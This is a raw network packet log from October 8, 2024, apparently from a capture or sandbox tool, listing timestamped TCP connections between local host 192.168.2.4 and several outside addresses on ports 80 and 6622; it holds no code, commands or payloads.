                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.997236967 CEST80502893.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.997246981 CEST805029047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.997256041 CEST805029047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.301970959 CEST502916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.306876898 CEST662250291204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.306942940 CEST502916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.310432911 CEST502916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.315345049 CEST662250291204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.469254971 CEST80502893.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.469404936 CEST5028980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.469786882 CEST80502893.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.469835043 CEST5028980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.474230051 CEST80502893.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.506942034 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.511967897 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.512036085 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.512155056 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.512182951 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.517083883 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.517096996 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.977955103 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.978082895 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.978130102 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.978213072 CEST5029280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.983129978 CEST805029218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.994204044 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.999686003 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.999948025 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.999948025 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.999988079 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.004992008 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.005247116 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314007044 CEST805029047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314213991 CEST5029080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314223051 CEST805029047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314275026 CEST5029080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.319056034 CEST805029047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.328171015 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.333064079 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.333139896 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.333334923 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.333334923 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.338212013 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.338356018 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.468184948 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.468341112 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.468379021 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.468379021 CEST5029380192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.473256111 CEST805029344.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.484683037 CEST5029580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.489541054 CEST80502953.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.490633965 CEST5029580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.490633965 CEST5029580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.490633965 CEST5029580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.495559931 CEST80502953.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.495594978 CEST80502953.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.784411907 CEST662250291204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.784491062 CEST502916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.784638882 CEST502916622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.789503098 CEST662250291204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.797868967 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.798019886 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.798139095 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.798170090 CEST5029480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.803102970 CEST805029444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.811388016 CEST5029680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.816284895 CEST805029644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.816673994 CEST5029680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.817538023 CEST5029680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.817538977 CEST5029680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.822427034 CEST805029644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.822674990 CEST805029644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.972043037 CEST80502953.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.972301006 CEST5029580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.974176884 CEST80502953.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.974416018 CEST5029580192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.977185965 CEST80502953.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.114409924 CEST502976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.119483948 CEST662250297204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.119570017 CEST502976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.123245001 CEST502976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.128191948 CEST662250297204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.174331903 CEST5029880192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.179822922 CEST805029835.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.180728912 CEST5029880192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.201905966 CEST5029880192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.201958895 CEST5029880192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.206933022 CEST805029835.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.206954002 CEST805029835.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.273828983 CEST805029644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.274071932 CEST5029680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.274492025 CEST805029644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.274553061 CEST5029680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.278947115 CEST805029644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.289794922 CEST5029980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.294708014 CEST805029918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.294804096 CEST5029980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.294935942 CEST5029980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.294955015 CEST5029980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.300580025 CEST805029918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.300590038 CEST805029918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.041601896 CEST805029835.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.041766882 CEST5029880192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.042063951 CEST805029835.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.042110920 CEST5029880192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.046760082 CEST805029835.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.057881117 CEST5030080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.062802076 CEST805030018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.062866926 CEST5030080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.063146114 CEST5030080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.063146114 CEST5030080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.068125010 CEST805030018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.068311930 CEST805030018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.519711018 CEST805030018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.519731045 CEST805030018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.519828081 CEST5030080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.519989014 CEST5030080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.524897099 CEST805030018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.542033911 CEST5030180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.547595978 CEST805030154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.547658920 CEST5030180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.548016071 CEST5030180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.548057079 CEST5030180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.555573940 CEST805030154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.555589914 CEST805030154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.605534077 CEST662250297204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.605724096 CEST502976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.605787992 CEST502976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.611609936 CEST662250297204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.708065033 CEST805029918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.708385944 CEST805029918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.708528996 CEST5029980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.708575964 CEST5029980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.713571072 CEST805029918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.724436998 CEST5030280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.730338097 CEST805030218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.734699011 CEST5030280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.734817982 CEST5030280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.734848022 CEST5030280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.739665031 CEST805030218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.739757061 CEST805030218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.927433014 CEST503036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.932297945 CEST662250303204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.932779074 CEST503036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.941013098 CEST503036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.946266890 CEST662250303204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.193026066 CEST805030218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.193175077 CEST5030280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.193192959 CEST805030218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.193248034 CEST5030280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.197998047 CEST805030218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.214502096 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.219662905 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.219722033 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.220072031 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.220093966 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.225208044 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.225219011 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.271675110 CEST805030154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.271842957 CEST805030154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.271927118 CEST5030180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.271965027 CEST5030180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.276803017 CEST805030154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.291306973 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.296260118 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.296320915 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.296818018 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.296818018 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.301877975 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.301894903 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.692353010 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.692538977 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.693367004 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.693484068 CEST5030480192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.697580099 CEST805030444.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.706682920 CEST5030680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.711613894 CEST805030613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.711704969 CEST5030680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.711848974 CEST5030680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.711868048 CEST5030680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.716974020 CEST805030613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.717565060 CEST805030613.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.763098001 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.763329029 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.763412952 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.763735056 CEST5030580192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.768244028 CEST805030544.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.781363964 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.786581039 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.786662102 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.786889076 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.786911011 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.791822910 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.792363882 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.411268950 CEST5030680192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.413072109 CEST5030880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.887947083 CEST662250303204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888380051 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888392925 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888408899 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888489008 CEST662250303204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888520956 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888537884 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888556004 CEST503036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888556004 CEST503036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888556004 CEST503036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888598919 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888600111 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888760090 CEST662250303204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.888835907 CEST503036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.889511108 CEST5030780192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.890223980 CEST805030813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.890300035 CEST5030880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.890495062 CEST5030880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.890512943 CEST5030880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.897639036 CEST662250303204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.897650957 CEST805030754.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.897770882 CEST805030813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.897783041 CEST805030813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.908658981 CEST5030980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.913853884 CEST805030918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.914752007 CEST5030980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.914885998 CEST5030980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.914885998 CEST5030980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.920172930 CEST805030918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.920183897 CEST805030918.141.10.107192.168.2.4
